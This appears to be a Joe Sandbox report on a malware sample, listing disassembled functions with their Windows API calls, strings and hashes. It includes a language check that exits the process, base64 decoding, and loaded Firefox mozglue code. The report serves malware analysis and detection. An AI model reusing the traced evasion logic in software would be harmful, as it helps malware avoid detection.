Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A

Part of subcall function 004893C0: GlobalAlloc.KERNEL32(00000000,004843DD,004843DD), ref: 004893D3

StrStrA.SHLWAPI(?,0110E440), ref: 004843F3
GlobalFree.KERNEL32(?), ref: 00484512

Part of subcall function 00479AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479AEF
Part of subcall function 00479AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00474EEE,00000000,?), ref: 00479B01
Part of subcall function 00479AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479B2A
Part of subcall function 00479AC0: LocalFree.KERNEL32(?,?,?,?,00474EEE,00000000,?), ref: 00479B3F

lstrcat.KERNEL32(?,00000000), ref: 004844A3
StrCmpCA.SHLWAPI(?,004908D1), ref: 004844C0
lstrcat.KERNEL32(00000000,00000000), ref: 004844D2
lstrcat.KERNEL32(00000000,?), ref: 004844E5
lstrcat.KERNEL32(00000000,00490FB8), ref: 004844F4

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: 26d4bab8dfb3708b13fd716ea8dbd99d74a5edc9e8454b7c75cdd8885a810152
Instruction ID: 4e8fbae1ca5ef44d45bc70960e8abd829b72cabbc7f4c1807074b3510b1505cd
Opcode Fuzzy Hash: 26d4bab8dfb3708b13fd716ea8dbd99d74a5edc9e8454b7c75cdd8885a810152
Instruction Fuzzy Hash: 127157B6900208BBDB14FBE0DC85FEE7379AB88304F04859DF60997181DA78DB55CB95

Function 6C64AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C64AC52
CreateFileMappingW.KERNEL32 ref: 6C64AC7D
GetSystemInfo.KERNEL32 ref: 6C64AC98
MapViewOfFile.KERNEL32 ref: 6C64ACB0
GetSystemInfo.KERNEL32 ref: 6C64ACCD
MapViewOfFile.KERNEL32 ref: 6C64AD05
UnmapViewOfFile.KERNEL32 ref: 6C64AD1C
CloseHandle.KERNEL32 ref: 6C64AD28
UnmapViewOfFile.KERNEL32 ref: 6C64AD37
CloseHandle.KERNEL32 ref: 6C64AD43
CloseHandle.KERNEL32 ref: 6C64AD67

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 28a41daa44422bcc13f89726b79d7d21badc0acb9e79d3c68066292f776e565c
Instruction ID: a1f297120fdf6c195818c47c08576ed2759a5a463c55d03ff0cc186c42b4ba4a
Opcode Fuzzy Hash: 28a41daa44422bcc13f89726b79d7d21badc0acb9e79d3c68066292f776e565c
Instruction Fuzzy Hash: 58315FB1A04744DFDB00EF7AD68826EBBF0BF85305F01892DE98587211EB709459CB87

Function 6C639D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C638273), ref: 6C639D65
free.MOZGLUE(6C638273,?), ref: 6C639D7C
free.MOZGLUE(?,?), ref: 6C639D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C639E0F
free.MOZGLUE(6C63946B,?,?), ref: 6C639E24
free.MOZGLUE(?,?,?), ref: 6C639E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C639EC8
free.MOZGLUE(6C63946B,?,?,?), ref: 6C639EDF
free.MOZGLUE(?,?,?,?), ref: 6C639EF5

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 667c0c3915fafe119bd27ce3bb7bb87517c670060de04df807ff0fa869c671a1
Instruction ID: 587c2f74ebfdd36cd64e79502b0506427e7dcd91c7f84a891a54a5ef6dc141a1
Opcode Fuzzy Hash: 667c0c3915fafe119bd27ce3bb7bb87517c670060de04df807ff0fa869c671a1
Instruction Fuzzy Hash: F471AE70909B518BD716CF18C58055BF3F4FF99319B44A619E88E5BB11EB30E886CF89

Function 6C63DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C63DDCF

Part of subcall function 6C61FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C61FA4B

Part of subcall function 6C6390E0: free.MOZGLUE(?,00000000,?,?,6C63DEDB), ref: 6C6390FF
Part of subcall function 6C6390E0: free.MOZGLUE(?,00000000,?,?,6C63DEDB), ref: 6C639108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C63DE0D
free.MOZGLUE(00000000), ref: 6C63DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C63DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C63DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C63DEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C62DEFD,?,6C5F4A68), ref: 6C63DF32

Part of subcall function 6C63DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C63DB86
Part of subcall function 6C63DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C63DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C62DEFD,?,6C5F4A68), ref: 6C63DF65
free.MOZGLUE(?), ref: 6C63DF80

Part of subcall function 6C605E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C605EDB
Part of subcall function 6C605E90: memset.VCRUNTIME140(ewdl,000000E5,?), ref: 6C605F27
Part of subcall function 6C605E90: LeaveCriticalSection.KERNEL32(?), ref: 6C605FB2

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 79d87447d7e7708312ed543ed91c231ed02c1067ab00479f7cfad12f69022925
Instruction ID: 09da275d4bfde0ebe66d9ffac32ae377a3398e65e2c5b5911ef3f700fb926f57
Opcode Fuzzy Hash: 79d87447d7e7708312ed543ed91c231ed02c1067ab00479f7cfad12f69022925
Instruction Fuzzy Hash: 4851C6726116209BD7119B29C8806AE77B2AF92308F95311DD45E53B41DB31F91ACB8E

Function 6C645D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C645C8C,?,6C61E829), ref: 6C645D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C645C8C,?,6C61E829), ref: 6C645D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C645C8C,?,6C61E829), ref: 6C645D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C645C8C,?,6C61E829), ref: 6C645D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C645C8C,?,6C61E829), ref: 6C645DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C645C8C,?,6C61E829), ref: 6C645DC9
std::_Facet_Register.LIBCPMT ref: 6C645DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C645C8C,?,6C61E829), ref: 6C645E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C645C8C,?,6C61E829), ref: 6C645E45

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 87b2584a9934803350d690e533fbb7c0c25ece8b6ea2b0e3c844fdbead434edf
Instruction ID: d654b1bee60c5d4a9a237f847fd71fab2887151ebfdc45c9abc735a2a0c037d6
Opcode Fuzzy Hash: 87b2584a9934803350d690e533fbb7c0c25ece8b6ea2b0e3c844fdbead434edf
Instruction Fuzzy Hash: 10416D717002059FCB00DF66C8D8AAE77F6FF89314F548068E50A9B791EB31A805CBA9

Function 6C61CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C5E31A7), ref: 6C61CDDD

Strings

<jemalloc>, xrefs: 6C61CF9F, 6C61CFB3
: (malloc) Error in VirtualFree(), xrefs: 6C61CFA4, 6C61CFB8

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: c96567331a3371a12d8b1d45fd415411746c5de7b314ca293b4407d2915f99aa
Instruction ID: 126da4394eff2680145ef6442b54009625531d4816e59c01a2cb25dc87204226
Opcode Fuzzy Hash: c96567331a3371a12d8b1d45fd415411746c5de7b314ca293b4407d2915f99aa
Instruction Fuzzy Hash: DE31A630748205ABEB14AEAF8C55BBE7B75AF81755F204024F512EBE80DB70D501CB9E

Function 6C5EECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5EF100: LoadLibraryW.KERNEL32(shell32,?,6C65D020), ref: 6C5EF122
Part of subcall function 6C5EF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C5EF132

moz_xmalloc.MOZGLUE(00000012), ref: 6C5EED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5EEDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C5EEDCC
CreateFileW.KERNEL32 ref: 6C5EEE08
free.MOZGLUE(00000000), ref: 6C5EEE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C5EEE32

Part of subcall function 6C5EEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C5EEBB5
Part of subcall function 6C5EEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C61D7F3), ref: 6C5EEBC3
Part of subcall function 6C5EEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C61D7F3), ref: 6C5EEBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C5EEDC1

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 7e3fd77fcaa935e7aa0c66c3305daa49d06d3c93d057f06f34f0c3d222977349
Instruction ID: 50466ff7b5c681053d98e648fcb532544b47dfff3690c2f62217dc3af6f886a8
Opcode Fuzzy Hash: 7e3fd77fcaa935e7aa0c66c3305daa49d06d3c93d057f06f34f0c3d222977349
Instruction Fuzzy Hash: 0D51E171D15204CBDB00DF68CD806AEB7B1AF4E318F44882DE8557B740E7706949CBE6

Function 6C65A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C65A565

Part of subcall function 6C65A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65A4BE
Part of subcall function 6C65A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C65A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C65A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C65A6B6

Strings

z, xrefs: 6C65A6AE
0, xrefs: 6C65A5FB

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 2f970d590be671865d60c4fc5c156a6955355b13c433efbf8c0990301ef5d92a
Instruction ID: 6045b2bf6fdb5942dfd0df7b94878664592842f07fa958092d5df3ff4daa88d3
Opcode Fuzzy Hash: 2f970d590be671865d60c4fc5c156a6955355b13c433efbf8c0990301ef5d92a
Instruction Fuzzy Hash: 0F4147719087459FC341CF28C480A9ABBE5BF89344F908A2EF49987691EB30D659CB96

Function 6C629420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C61AB89: EnterCriticalSection.KERNEL32(6C66E370,?,?,?,6C5E34DE,6C66F6CC,?,?,?,?,?,?,?,6C5E3284), ref: 6C61AB94
Part of subcall function 6C61AB89: LeaveCriticalSection.KERNEL32(6C66E370,?,6C5E34DE,6C66F6CC,?,?,?,?,?,?,?,6C5E3284,?,?,6C6056F6), ref: 6C61ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5F4A68), ref: 6C62945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C629470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C629482
__Init_thread_footer.LIBCMT ref: 6C62949F

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C62946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C62947D
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C629459

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 5ed9a6e7607faf59d119f06fbd57defd431713959268a42ac1c1b75da91f1b85
Instruction ID: b1d3254dd5e8d67afd47e6e5b1852c0c7e958dd3d187198bc2e166b1acddc709
Opcode Fuzzy Hash: 5ed9a6e7607faf59d119f06fbd57defd431713959268a42ac1c1b75da91f1b85
Instruction Fuzzy Hash: 62014730A0410187EB009B6FD8A0BA933B4AF4632DF040537ED0AC6F42E637E8548D5F

Function 00486770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00486774
ExitProcess.KERNEL32 ref: 004867A5
ExitProcess.KERNEL32 ref: 004867AF
ExitProcess.KERNEL32 ref: 004867B9
ExitProcess.KERNEL32 ref: 004867C3
ExitProcess.KERNEL32 ref: 004867CD

Strings

*, xrefs: 0048678C

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 8f5910ae322d992617e449d3d4ea6967f6952df243d3920ff64f31f15f1e7ec4
Instruction ID: 91f6988b59c1b924a161d96389ba3626df4b964ed1263351ccbb517cee3ec545
Opcode Fuzzy Hash: 8f5910ae322d992617e449d3d4ea6967f6952df243d3920ff64f31f15f1e7ec4
Instruction Fuzzy Hash: 3AF05E74908249FFE384AFE0E90972C7B71FB04703F0402ADF60986290DA764B919BD6

Function 6C65B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C65B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C65B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C65B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C65B5F4
__Init_thread_footer.LIBCMT ref: 6C65B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C65B61F
std::_Facet_Register.LIBCPMT ref: 6C65B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C65B655

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 83425b049b9697cd339d323294729072c77b70747251024846d588ba6cabed03
Instruction ID: e2ba30688f5f74e89659eec813565c9ddf86adc57938ad24c3ba9a8e9608ddfd
Opcode Fuzzy Hash: 83425b049b9697cd339d323294729072c77b70747251024846d588ba6cabed03
Instruction Fuzzy Hash: 83318172B00114CBCB04DF6BC8989BEB7F5EBCA325F540515E90297740DB30A8168F9E

Function 6C61D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C5EEB57,?,?,?,?,?,?,?,?,?), ref: 6C61D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C5EEB57,?), ref: 6C61D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C5EEB57,?), ref: 6C61D673
free.MOZGLUE(?), ref: 6C61D888

Strings

|Enabled, xrefs: 6C61D81E
